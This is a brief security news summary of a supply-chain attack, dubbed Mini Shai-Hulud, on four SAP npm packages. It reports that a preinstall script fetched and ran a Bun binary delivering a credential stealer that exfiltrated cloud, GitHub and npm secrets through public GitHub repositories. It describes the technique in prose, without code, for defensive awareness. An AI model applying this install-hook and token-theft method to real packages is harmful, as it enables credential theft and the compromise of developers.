Four SAP-related NPM packages used in the CAP and Cloud MTA build workflows were injected with a malicious preinstall script that fetched and executed a Bun binary, delivering an information-stealing payload targeting local and cloud credentials. The compromised packages were unpublished within hours, but the campaign exfiltrated secrets to public GitHub repositories and researchers attribute the operation, dubbed Mini Shai-Hulud, to the TeamPCP group. #MiniShaiHulud #TeamPCP
Keypoints
- Four SAP NPM packages (mbt 1.2.48, @cap-js/db-service 2.10.1, @cap-js/postgres 2.2.2, @cap-js/sqlite 2.2.2) were injected with malicious code.
- A preinstall script downloaded a Bun ZIP from GitHub, extracted and executed the Bun binary to bootstrap the malware at runtime.
- The information stealer targeted local credentials, GitHub and NPM tokens, and cloud secrets for AWS, Azure, GCP, GitHub Actions, and Kubernetes.
- Exfiltration occurred via public GitHub repositories labeled “A Mini Shai-Hulud has Appeared,” and the malware can propagate by tampering with package tarballs using stolen GitHub Actions tokens.
- Malicious versions were live for roughly 2–4 hours before being unpublished; Wiz links the attack to TeamPCP based on a shared RSA public key used to encrypt exfiltrated data.
Read More: https://www.securityweek.com/sap-npm-packages-targeted-in-supply-chain-attack/